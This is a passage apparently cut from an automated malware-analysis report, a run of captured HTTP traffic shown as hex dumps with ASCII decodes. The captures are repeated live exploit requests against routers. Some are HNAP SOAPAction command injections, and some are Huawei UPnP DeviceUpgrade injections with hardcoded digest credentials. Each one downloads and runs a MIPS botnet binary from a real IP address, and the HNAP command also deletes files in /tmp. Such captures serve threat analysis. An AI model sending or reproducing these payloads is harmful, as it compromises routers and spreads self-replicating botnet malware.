32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 